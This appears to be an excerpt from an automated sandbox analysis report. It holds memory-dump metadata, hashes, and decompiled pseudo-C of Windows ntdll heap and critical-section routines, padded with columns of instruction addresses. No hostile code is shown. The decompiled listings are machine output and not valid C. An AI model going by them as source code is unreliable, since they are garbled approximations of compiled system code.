                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx
                                                                  • API String ID: 0-89312691
                                                                  • Opcode ID: 7e982df561882c5a961d7044baa1f5bbb66d708603f81cff9946b942259f1afe
                                                                  • Instruction ID: 066fc0b9561b30427710a589aeba2671cf9fa8c40fb93ab9f4080c607837595d
                                                                  • Opcode Fuzzy Hash: 7e982df561882c5a961d7044baa1f5bbb66d708603f81cff9946b942259f1afe
                                                                  • Instruction Fuzzy Hash: 5F118E35344A028BEB24CE1D949063672DAEBC5734F35493AEC66CB3B9EA70F8408380
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049E8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 71%
                                                                  			E049E8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4a10d50);
				E0498D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E049C5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0498DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0498DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0498D130(_t34, _t39, _t40);
			}





                                                                  0x049e8df1
                                                                  0x049e8df1
                                                                  0x049e8df1
                                                                  0x049e8df1
                                                                  0x049e8df1
                                                                  0x049e8df1
                                                                  0x049e8df3
                                                                  0x049e8df8
                                                                  0x049e8dfd
                                                                  0x049e8e00
                                                                  0x049e8e0e
                                                                  0x049e8e2a
                                                                  0x049e8e36
                                                                  0x049e8e38
                                                                  0x049e8e3c
                                                                  0x049e8e46
                                                                  0x049e8e46
                                                                  0x049e8e36
                                                                  0x049e8e50
                                                                  0x049e8e56
                                                                  0x049e8e59
                                                                  0x049e8e5c
                                                                  0x049e8e60
                                                                  0x049e8e67
                                                                  0x049e8e6d
                                                                  0x049e8e73
                                                                  0x049e8e74
                                                                  0x049e8eb1
                                                                  0x049e8ebd

                                                                  Strings
                                                                  • Critical error detected %lx, xrefs: 049E8E21
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Critical error detected %lx
                                                                  • API String ID: 0-802127002
                                                                  • Opcode ID: 7f3c46a543b5d0bc0254c37bfd964e0db20132550e6aa061a5f817cedf27c0dd
                                                                  • Instruction ID: 1747acafd6f666532bd0385a82d2b6d73ac739cb3279d8e3f5dbb693764fa745
                                                                  • Opcode Fuzzy Hash: 7f3c46a543b5d0bc0254c37bfd964e0db20132550e6aa061a5f817cedf27c0dd
                                                                  • Instruction Fuzzy Hash: DD118B71D04348EBEF26EFA9C509BECBBB4BB44314F20426DD028AB282C3346601CF14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049CFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 049CFF60
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                  • API String ID: 0-1911121157
                                                                  • Opcode ID: b81f8c9392e9e32656ee2bc4722385efc2e0d352ac96cd38c3a6a500b7d4ddf9
                                                                  • Instruction ID: df2d2ea8b29570f1c7179c064b9a29d229935ffde70936554c4e92798d334b15
                                                                  • Opcode Fuzzy Hash: b81f8c9392e9e32656ee2bc4722385efc2e0d352ac96cd38c3a6a500b7d4ddf9
                                                                  • Instruction Fuzzy Hash: 8D110471990144EFEB26EF54C948FA87BB2FF48718F158068E104671E1C739BA40DB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A05BA5, Relevance: .6, Instructions: 592COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 88%
                                                                  			E04A05BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4a11178);
				E0498D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04A04C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0497D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04A05542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4a260e8;
								if( *0x4a260e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4a260e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04979710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04976DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0497F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0497F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0497F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0497FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0497FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0497F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0497F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04A04CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0498D130(_t427, _t494, _t511);
				}
			}










































































                                                                  0x04a05ba5
                                                                  0x04a05baa
                                                                  0x04a05baf
                                                                  0x04a05bb4
                                                                  0x04a05bb6
                                                                  0x04a05bbc
                                                                  0x04a05bbe
                                                                  0x04a05bc4
                                                                  0x04a05bcd
                                                                  0x04a05bd3
                                                                  0x04a05bd6
                                                                  0x04a05bdc
                                                                  0x04a05be0
                                                                  0x04a05be3
                                                                  0x04a05beb
                                                                  0x04a05bf2
                                                                  0x04a05bf8
                                                                  0x04a05bfe
                                                                  0x04a05c04
                                                                  0x04a05c0e
                                                                  0x04a05c18
                                                                  0x04a05c1f
                                                                  0x04a05c25
                                                                  0x04a05c2a
                                                                  0x04a05c2c
                                                                  0x04a05c32
                                                                  0x04a05c3a
                                                                  0x04a05c3f
                                                                  0x04a05c42
                                                                  0x04a05c48
                                                                  0x04a05c5b
                                                                  0x04a05c5b
                                                                  0x04a05c2c
                                                                  0x04a05cb7
                                                                  0x04a05cb9
                                                                  0x04a05cbf
                                                                  0x04a05cc2
                                                                  0x04a05cca
                                                                  0x04a05ccb
                                                                  0x04a05ccb
                                                                  0x04a05cd1
                                                                  0x04a05cd7
                                                                  0x04a05cda
                                                                  0x04a05ce1
                                                                  0x04a05ce4
                                                                  0x04a05ce7
                                                                  0x04a05ced
                                                                  0x04a05cf3
                                                                  0x04a05cf9
                                                                  0x04a05cff
                                                                  0x04a05d08
                                                                  0x04a05d0a
                                                                  0x04a05d0e
                                                                  0x04a05d10
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05d16
                                                                  0x04a05d1a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05d20
                                                                  0x04a05d22
                                                                  0x04a05d25
                                                                  0x04a05d2f
                                                                  0x04a05d2f
                                                                  0x04a05d33
                                                                  0x04a05d3d
                                                                  0x04a05d49
                                                                  0x04a05d4b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05d5a
                                                                  0x04a05d5d
                                                                  0x04a05d60
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05d66
                                                                  0x04a05d69
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a05d6f
                                                                  0x04a05d6f
                                                                  0x04a05d73
                                                                  0x04a05d79
                                                                  0x04a05d7f
                                                                  0x04a05d86
                                                                  0x04a05d95
                                                                  0x04a05d98
                                                                  0x04a05dba
                                                                  0x04a05dcb
                                                                  0x04a05dce
                                                                  0x04a05dd3
                                                                  0x04a05dd6
                                                                  0x04a05dd8
                                                                  0x04a05de6
                                                                  0x04a05dec
                                                                  0x04a05dee
                                                                  0x04a05df1
                                                                  0x04a05df3
                                                                  0x04a0635a
                                                                  0x04a0635a
                                                                  0x00000000
                                                                  0x04a0635a
                                                                  0x04a05dfe
                                                                  0x04a05e02
                                                                  0x04a05e05
                                                                  0x04a05e07
                                                                  0x04a05e10
                                                                  0x04a05e13
                                                                  0x04a05e1b
                                                                  0x04a05e1c
                                                                  0x04a05e21
                                                                  0x04a05e22
                                                                  0x04a05e23
                                                                  0x04a05e25
                                                                  0x04a05e2a
                                                                  0x04a05e2c
                                                                  0x04a05e2e
                                                                  0x04a05e36
                                                                  0x04a05e39
                                                                  0x04a05e42
                                                                  0x04a05e47
                                                                  0x04a05e4d
                                                                  0x04a05e54
                                                                  0x04a05e54
                                                                  0x04a05e54
                                                                  0x04a05e2e
                                                                  0x04a05e5c
                                                                  0x04a05e5f
                                                                  0x04a05e62
                                                                  0x04a05e64
                                                                  0x04a05e6b
                                                                  0x04a05e70
                                                                  0x04a05e7a
                                                                  0x04a05e7a
                                                                  0x04a05e7a
                                                                  0x04a05e6b
                                                                  0x04a05e7e
                                                                  0x04a05e7f
                                                                  0x04a05e7f
                                                                  0x04a05e81
                                                                  0x04a05e87
                                                                  0x04a05e8b
                                                                  0x04a05e8c
                                                                  0x04a05e8c
                                                                  0x04a05e8c
                                                                  0x04a05e9a
                                                                  0x04a05e9c
                                                                  0x04a05ea2
                                                                  0x04a05ea6
                                                                  0x04a05f50
                                                                  0x04a05f50
                                                                  0x04a05f57
                                                                  0x04a05f66
                                                                  0x04a05f66
                                                                  0x04a05f66
                                                                  0x04a05f68
                                                                  0x04a05f6a
                                                                  0x04a063d0
                                                                  0x00000000
                                                                  0x04a05f70
                                                                  0x04a05f70
                                                                  0x04a05f91
                                                                  0x04a05f9c
